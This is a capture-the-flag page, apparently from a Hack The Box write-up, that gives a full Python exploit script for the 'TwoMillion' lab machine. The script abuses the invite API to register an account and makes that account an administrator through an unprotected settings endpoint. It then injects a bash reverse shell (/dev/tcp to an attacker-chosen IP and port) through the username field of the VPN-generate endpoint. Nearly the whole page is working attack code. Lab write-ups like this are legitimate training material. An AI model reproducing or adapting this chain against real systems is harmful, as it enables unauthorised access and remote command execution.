Python Script
With the script you gain www-data access to machine:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
#!/usr/bin/env python3
"""
TwoMillion Foothold
-------------------
Author: Marss
Date: 19 July, 2023
"""
from argparse import ArgumentParser, RawDescriptionHelpFormatter
from base64 import b64decode
from json import loads
from random import choice
from requests import Session, Request
from string import ascii_letters
from signal import signal, SIGINT
# debugging
import pdb
# Ctrl + c
# (function)
def signal_handler(signum, frame):
exit('\n[!] User terminated.')
# (signal)
signal(SIGINT, signal_handler)
# Main class
class Exploit:
def __init__(self, args):
self.args = args
self.target_host = {
'ip_addres':'10.10.11.221',
'domain_url':'2million.htb'
}
self.session = Session()
# set proxies
#self.proxies = {'http': 'http://127.1:8080'}
#self.session.proxies.update(self.proxies)
def run(self):
try:
invite_code = self.generate_code()
random_user = self.get_random_string(5)
username = self.register(invite_code, random_user)
self.login(username)
self.set_admin_perm(username)
print(f'[*] Open port {self.args.port} to receive the shell.')
input(f'[*] Press ENTER to continue.')
self.reverse_shell()
except Exception as error:
exit('\n[x] Error: ' + repr(error))
def b64_decode(self, encoded_data: str) -> str:
b64_bytes = encoded_data.encode('ascii')
cont_bytes = b64decode(b64_bytes)
decoded_data = cont_bytes.decode('ascii')
return decoded_data
def generate_code(self)-> str:
req = Request('POST', 'http://' + self.target_host['domain_url'] + '/api/v1/invite/generate')
prepare_req = self.session.prepare_request(req)
response = self.session.send(prepare_req)
b64_code = loads(response.text)['data']['code']
return self.b64_decode(b64_code)
def get_random_string(self, length: int) -> str:
return ''.join(choice(ascii_letters) for i in range(length))
def register(self, invite_code: str, user: str) -> str:
post_data = {
'code': f'{invite_code}',
'username': f'{user}',
'email': f'{user}@2million.htb',
'password': f'{user}',
'password_confirmation': f'{user}'
}
req = Request('POST', 'http://' + self.target_host['domain_url'] + '/api/v1/user/register',
data=post_data)
prepare_req = self.session.prepare_request(req)
self.session.send(prepare_req)
return user
def login(self, user: str) -> str:
post_data = {
'email': f'{user}@2million.htb',
'password': f'{user}'
}
req = Request('POST', 'http://' + self.target_host['domain_url'] + '/api/v1/user/login',
data=post_data)
prepare_req = self.session.prepare_request(req)
self.session.send(prepare_req)
def set_admin_perm(self, user: str) -> str:
post_data = {
'email': f'{user}@2million.htb',
'is_admin': 1
}
req = Request('PUT', 'http://' + self.target_host['domain_url'] + '/api/v1/admin/settings/update',
json=post_data)
prepare_req = self.session.prepare_request(req)
self.session.send(prepare_req)
def reverse_shell(self):
bash_shell = "bash -c 'bash -i >& /dev/tcp/{}/{} 0>&1'".format(self.args.ip, self.args.port)
post_data = {
'username': f';{bash_shell};'
}
req = Request('POST', 'http://' + self.target_host['domain_url'] + '/api/v1/admin/vpn/generate',
json=post_data)
prepare_req = self.session.prepare_request(req)
self.session.send(prepare_req)
# Main flow
if __name__ == '__main__':
ascii_title="""|Two Million HTB|"""
parser = ArgumentParser(
formatter_class=RawDescriptionHelpFormatter,
epilog="Example:\n\npython3 foothold.py -i 10.10.10.10 -p 4444")
parser.add_argument('-i', '--ip', type=str, required=True, help='Specified IP to receive the shell')
parser.add_argument('-p', '--port', type=str, required=True, help='Specified PORT to receive the shell')
args = parser.parse_args()
print(ascii_title)
exploit = Exploit(args)
exploit.run()
PoC
Puedes encontrar el script y sus requerimientos en mi repositorio: https://github.com/E1P0TR0